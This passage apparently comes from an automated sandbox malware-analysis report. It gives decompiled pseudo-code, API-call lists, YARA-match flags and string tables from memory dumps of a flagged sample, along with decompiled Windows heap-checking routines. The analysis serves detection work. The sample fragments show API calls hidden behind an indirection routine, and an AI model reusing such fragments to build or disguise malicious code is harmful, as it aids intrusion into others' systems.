                                                				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t32 = _t14;
                                                					if(_t14 == 0) {
                                                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                					}
                                                					return _t14;
                                                				}
                                                				return _t13;
                                                			}

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 16%
                                                			E0041A187(void* __eax, void* __edi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
                                                
                                                				asm("clc");
                                                				asm("fiadd dword [eax-0x7976ad65]");
                                                				if (__eflags < 0) goto L3;
                                                			}

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A210
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A06D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A080(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                				char _t10;
                                                				void* _t15;
                                                
                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                				E0041A970(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A0AD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A1E0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				intOrPtr _t7;
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				_t7 = _a4;
                                                				E0041A970(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A210
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A0C0(intOrPtr _a4, int _a8) {
                                                				void* _t10;
                                                
                                                				_t5 = _a4;
                                                				E0041A970(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0E8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                • The critical section is owned by thread %p., xrefs: 0146B3B9
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0146B48F
                                                • <unknown>, xrefs: 0146B27E, 0146B2D1, 0146B350, 0146B399, 0146B417, 0146B48E
                                                • read from, xrefs: 0146B4AD, 0146B4B2
                                                • a NULL pointer, xrefs: 0146B4E0
                                                • This failed because of error %Ix., xrefs: 0146B446
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0146B39B
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0146B53F
                                                • *** Inpage error in %ws:%s, xrefs: 0146B418
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0146B305
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0146B47D
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0146B476
                                                • *** then kb to get the faulting stack, xrefs: 0146B51C
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B3D6
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0146B2DC
                                                • The instruction at %p referenced memory at %p., xrefs: 0146B432
                                                • an invalid address, %p, xrefs: 0146B4CF
                                                • The resource is owned shared by %d threads, xrefs: 0146B37E
                                                • *** enter .exr %p for the exception record, xrefs: 0146B4F1
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B38F
                                                • *** enter .cxr %p for the context, xrefs: 0146B50D
                                                • Go determine why that thread has not released the critical section., xrefs: 0146B3C5
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0146B352
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0146B2F3
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0146B484
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0146B314
                                                • write to, xrefs: 0146B4A6
                                                • The resource is owned exclusively by thread %p, xrefs: 0146B374
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0146B323
                                                • The instruction at %p tried to %s , xrefs: 0146B4B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                • Instruction ID: 51bd470bebbc589ffcad11dc56272ebb051cdb209d3c83dcbd9eb35a9f4de8d5
                                                • Opcode Fuzzy Hash: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                • Instruction Fuzzy Hash: 1F81E475B40210FFEB259A4ADC45D6B3B29EF66A5DF80406AF504AF332D2718452C6B3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01471C06() {
                                                				signed int _t27;
                                                				char* _t104;
                                                				char* _t105;
                                                				intOrPtr _t113;
                                                				intOrPtr _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr _t119;
                                                				intOrPtr _t120;
                                                
                                                				_t105 = 0x13948a4;
                                                				_t104 = "HEAP: ";
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E013BB150();
                                                				} else {
                                                					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push( *0x14a589c);
                                                				E013BB150("Heap error detected at %p (heap handle %p)\n",  *0x14a58a0);
                                                				_t27 =  *0x14a5898; // 0x0
                                                				if(_t27 <= 0xf) {
                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M01471E96))) {
                                                						case 0:
                                                							_t105 = "heap_failure_internal";
                                                							goto L21;
                                                						case 1:
                                                							goto L21;
                                                						case 2:
                                                							goto L21;
                                                						case 3:
                                                							goto L21;
                                                						case 4:
                                                							goto L21;
                                                						case 5:
                                                							goto L21;
                                                						case 6:
                                                							goto L21;
                                                						case 7:
                                                							goto L21;
                                                						case 8:
                                                							goto L21;
                                                						case 9:
                                                							goto L21;
                                                						case 0xa:
                                                							goto L21;
                                                						case 0xb:
                                                							goto L21;
                                                						case 0xc:
                                                							goto L21;
                                                						case 0xd:
                                                							goto L21;
                                                						case 0xe:
                                                							goto L21;
                                                						case 0xf:
                                                							goto L21;
                                                					}
                                                				}
                                                				L21:
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E013BB150();
                                                				} else {
                                                					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push(_t105);
                                                				E013BB150("Error code: %d - %s\n",  *0x14a5898);
                                                				_t113 =  *0x14a58a4; // 0x0
                                                				if(_t113 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E013BB150("Parameter1: %p\n",  *0x14a58a4);
                                                				}
                                                				_t115 =  *0x14a58a8; // 0x0
                                                				if(_t115 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E013BB150("Parameter2: %p\n",  *0x14a58a8);
                                                				}
                                                				_t117 =  *0x14a58ac; // 0x0
                                                				if(_t117 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E013BB150("Parameter3: %p\n",  *0x14a58ac);
                                                				}
                                                				_t119 =  *0x14a58b0; // 0x0
                                                				if(_t119 != 0) {
                                                					L41:
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					_push( *0x14a58b4);
                                                					E013BB150("Last known valid blocks: before - %p, after - %p\n",  *0x14a58b0);
                                                				} else {
                                                					_t120 =  *0x14a58b4; // 0x0
                                                					if(_t120 != 0) {
                                                						goto L41;
                                                					}
                                                				}
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E013BB150();
                                                				} else {
                                                					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				return E013BB150("Stack trace available at %p\n", 0x14a58c0);
                                                			}












                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                • Instruction ID: 115735cd9e3399b976099142915e3366c97ceea4115c7f4b89c762c7099e362c
                                                • Opcode Fuzzy Hash: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                • Instruction Fuzzy Hash: 82610636521141DFD711AB89D4C5DB5B7A8EB04D38B8A803FF6096F731EA349C428F4A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E01474AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                				signed int _v6;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t189;
                                                				intOrPtr _t191;
                                                				intOrPtr _t210;
                                                				signed int _t225;
                                                				signed char _t231;
                                                				intOrPtr _t232;
                                                				unsigned int _t245;
                                                				intOrPtr _t249;
                                                				intOrPtr _t259;
                                                				signed int _t281;
                                                				signed int _t283;
                                                				intOrPtr _t284;
                                                				signed int _t288;
                                                				signed int* _t294;
                                                				signed int* _t298;
                                                				intOrPtr* _t299;
                                                				intOrPtr* _t300;
                                                				signed int _t307;
                                                				signed int _t309;
                                                				signed short _t312;
                                                				signed short _t315;
                                                				signed int _t317;
                                                				signed int _t320;
                                                				signed int _t322;
                                                				signed int _t326;
                                                				signed int _t327;
                                                				void* _t328;
                                                				signed int _t332;
                                                				signed int _t340;
                                                				signed int _t342;
                                                				signed char _t344;
                                                				signed int* _t345;
                                                				void* _t346;
                                                				signed char _t352;
                                                				signed char _t367;
                                                				signed int _t374;
                                                				intOrPtr* _t378;
                                                				signed int _t380;
                                                				signed int _t385;
                                                				signed char _t390;
                                                				unsigned int _t392;
                                                				signed char _t395;
                                                				unsigned int _t397;
                                                				intOrPtr* _t400;
                                                				signed int _t402;
                                                				signed int _t405;
                                                				intOrPtr* _t406;
                                                				signed int _t407;
                                                				intOrPtr _t412;
                                                				void* _t414;
                                                				signed int _t415;
                                                				signed int _t416;
                                                				signed int _t429;
                                                
                                                				_v16 = _v16 & 0x00000000;
                                                				_t189 = 0;
                                                				_v8 = _v8 & 0;
                                                				_t332 = __edx;
                                                				_v12 = 0;
                                                				_t414 = __ecx;
                                                				_t415 = __edx;
                                                				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                					L88:
                                                					_t416 = _v16;
                                                					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                							L107:
                                                							return 1;
                                                						}
                                                						_t191 =  *[fs:0x30];
                                                						__eflags =  *(_t191 + 0xc);
                                                						if( *(_t191 + 0xc) == 0) {
                                                							_push("HEAP: ");
                                                							E013BB150();
                                                						} else {
                                                							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                						}
                                                						_push(_v12);
                                                						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                						_push(_t332);
                                                						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                						L122:
                                                						E013BB150();
                                                						L119:
                                                						return 0;
                                                					}
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push("HEAP: ");
                                                						E013BB150();
                                                					} else {
                                                						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					_push(_t416);
                                                					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                					_push(_t332);
                                                					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                					goto L122;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				do {
                                                					L1:
                                                					 *_a16 = _t415;
                                                					if( *(_t414 + 0x4c) != 0) {
                                                						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                						 *_t415 = _t392;
                                                						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                						_t424 = _t392 >> 0x18 - _t352;
                                                						if(_t392 >> 0x18 != _t352) {
                                                							_push(_t352);
                                                							E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                						}
                                                					}
                                                					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                						_t210 =  *[fs:0x30];
                                                						__eflags =  *(_t210 + 0xc);
                                                						if( *(_t210 + 0xc) == 0) {
                                                							_push("HEAP: ");
                                                							E013BB150();
                                                						} else {
                                                							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                						}
                                                						_push(_v8 & 0x0000ffff);
                                                						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                						__eflags = _t340;
                                                						_push(_t340);
                                                						E013BB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                						L117:
                                                						__eflags =  *(_t414 + 0x4c);
                                                						if( *(_t414 + 0x4c) != 0) {
                                                							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                							__eflags =  *_t415;
                                                						}
                                                						goto L119;
                                                					}
                                                					_t225 =  *_t415 & 0x0000ffff;
                                                					_t390 =  *(_t415 + 2);
                                                					_t342 = _t225;
                                                					_v8 = _t342;
                                                					_v20 = _t342;
                                                					_v28 = _t225 << 3;
                                                					if((_t390 & 0x00000001) == 0) {
                                                						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                						__eflags = _t344 & 0x00000001;
                                                						if((_t344 & 0x00000001) == 0) {
                                                							L66:
                                                							_t345 = _a12;
                                                							 *_a8 =  *_a8 + 1;
                                                							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                							__eflags =  *_t345;
                                                							L67:
                                                							_t231 =  *(_t415 + 6);
                                                							if(_t231 == 0) {
                                                								_t346 = _t414;
                                                							} else {
                                                								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                							}
                                                							if(_t346 != _t332) {
                                                								_t232 =  *[fs:0x30];
                                                								__eflags =  *(_t232 + 0xc);
                                                								if( *(_t232 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_push( *(_t415 + 6) & 0x000000ff);
                                                								_push(_t415);
                                                								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                								goto L95;
                                                							} else {
                                                								if( *((char*)(_t415 + 7)) != 3) {
                                                									__eflags =  *(_t414 + 0x4c);
                                                									if( *(_t414 + 0x4c) != 0) {
                                                										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                										__eflags =  *_t415;
                                                									}
                                                									_t415 = _t415 + _v28;
                                                									__eflags = _t415;
                                                									goto L86;
                                                								}
                                                								_t245 =  *(_t415 + 0x1c);
                                                								if(_t245 == 0) {
                                                									_t395 =  *_t415 & 0x0000ffff;
                                                									_v6 = _t395 >> 8;
                                                									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                										__eflags =  *(_t414 + 0x4c);
                                                										if( *(_t414 + 0x4c) != 0) {
                                                											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                											__eflags =  *_t415;
                                                										}
                                                										goto L107;
                                                									}
                                                									_t249 =  *[fs:0x30];
                                                									__eflags =  *(_t249 + 0xc);
                                                									if( *(_t249 + 0xc) == 0) {
                                                										_push("HEAP: ");
                                                										E013BB150();
                                                									} else {
                                                										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                									}
                                                									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                									_push(_t415);
                                                									_push("Heap block at %p is not last block in segment (%p)\n");
                                                									L95:
                                                									E013BB150();
                                                									goto L117;
                                                								}
                                                								_v12 = _v12 + 1;
                                                								_v16 = _v16 + (_t245 >> 0xc);
                                                								if( *(_t414 + 0x4c) != 0) {
                                                									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                								}
                                                								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                									L82:
                                                									_v8 = _v8 & 0x00000000;
                                                									goto L86;
                                                								} else {
                                                									if( *(_t414 + 0x4c) != 0) {
                                                										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                										 *_t415 = _t397;
                                                										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                										_t442 = _t397 >> 0x18 - _t367;
                                                										if(_t397 >> 0x18 != _t367) {
                                                											_push(_t367);
                                                											E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                										}
                                                									}
                                                									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                										_t259 =  *[fs:0x30];
                                                										__eflags =  *(_t259 + 0xc);
                                                										if( *(_t259 + 0xc) == 0) {
                                                											_push("HEAP: ");
                                                											E013BB150();
                                                										} else {
                                                											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                										}
                                                										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                										_push(_t415);
                                                										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                										goto L95;
                                                									} else {
                                                										if( *(_t414 + 0x4c) != 0) {
                                                											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                										}
                                                										goto L82;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t281 = _v28 + 0xfffffff0;
                                                						_v24 = _t281;
                                                						__eflags = _t390 & 0x00000002;
                                                						if((_t390 & 0x00000002) != 0) {
                                                							__eflags = _t281 - 4;
                                                							if(_t281 > 4) {
                                                								_t281 = _t281 - 4;
                                                								__eflags = _t281;
                                                								_v24 = _t281;
                                                							}
                                                						}
                                                						__eflags = _t390 & 0x00000008;
                                                						if((_t390 & 0x00000008) == 0) {
                                                							_t102 = _t415 + 0x10; // -8
                                                							_t283 = E0140D540(_t102, _t281, 0xfeeefeee);
                                                							_v20 = _t283;
                                                							__eflags = _t283 - _v24;
                                                							if(_t283 != _v24) {
                                                								_t284 =  *[fs:0x30];
                                                								__eflags =  *(_t284 + 0xc);
                                                								if( *(_t284 + 0xc) == 0) {
                                                									_push("HEAP: ");
                                                									E013BB150();
                                                								} else {
                                                									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                								}
                                                								_t288 = _v20 + 8 + _t415;
                                                								__eflags = _t288;
                                                								_push(_t288);
                                                								_push(_t415);
                                                								_push("Free Heap block %p modified at %p after it was freed\n");
                                                								goto L95;
                                                							}
                                                							goto L66;
                                                						} else {
                                                							_t374 =  *(_t415 + 8);
                                                							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                							_v24 = _t374;
                                                							_v28 = _t400;
                                                							_t294 =  *(_t374 + 4);
                                                							__eflags =  *_t400 - _t294;
                                                							if( *_t400 != _t294) {
                                                								L64:
                                                								_push(_t374);
                                                								_push( *_t400);
                                                								_t101 = _t415 + 8; // -16
                                                								E0147A80D(_t414, 0xd, _t101, _t294);
                                                								goto L86;
                                                							}
                                                							_t56 = _t415 + 8; // -16
                                                							__eflags =  *_t400 - _t56;
                                                							_t374 = _v24;
                                                							if( *_t400 != _t56) {
                                                								goto L64;
                                                							}
                                                							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                							_t402 =  *(_t414 + 0xb4);
                                                							__eflags = _t402;
                                                							if(_t402 == 0) {
                                                								L35:
                                                								_t298 = _v28;
                                                								 *_t298 = _t374;
                                                								 *(_t374 + 4) = _t298;
                                                								__eflags =  *(_t415 + 2) & 0x00000008;
                                                								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                									L39:
                                                									_t377 =  *_t415 & 0x0000ffff;
                                                									_t299 = _t414 + 0xc0;
                                                									_v28 =  *_t415 & 0x0000ffff;
                                                									 *(_t415 + 2) = 0;
                                                									 *((char*)(_t415 + 7)) = 0;
                                                									__eflags =  *(_t414 + 0xb4);
                                                									if( *(_t414 + 0xb4) == 0) {
                                                										_t378 =  *_t299;
                                                									} else {
                                                										_t378 = E013DE12C(_t414, _t377);
                                                										_t299 = _t414 + 0xc0;
                                                									}
                                                									__eflags = _t299 - _t378;
                                                									if(_t299 == _t378) {
                                                										L51:
                                                										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                										__eflags =  *_t300 - _t378;
                                                										if( *_t300 != _t378) {
                                                											_push(_t378);
                                                											_push( *_t300);
                                                											__eflags = 0;
                                                											E0147A80D(0, 0xd, _t378, 0);
                                                										} else {
                                                											_t87 = _t415 + 8; // -16
                                                											_t406 = _t87;
                                                											 *_t406 = _t378;
                                                											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                											 *_t300 = _t406;
                                                											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                										}
                                                										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                										_t405 =  *(_t414 + 0xb4);
                                                										__eflags = _t405;
                                                										if(_t405 == 0) {
                                                											L61:
                                                											__eflags =  *(_t414 + 0x4c);
                                                											if(__eflags != 0) {
                                                												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                											}
                                                											goto L86;
                                                										} else {
                                                											_t380 =  *_t415 & 0x0000ffff;
                                                											while(1) {
                                                												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                													break;
                                                												}
                                                												_t307 =  *_t405;
                                                												__eflags = _t307;
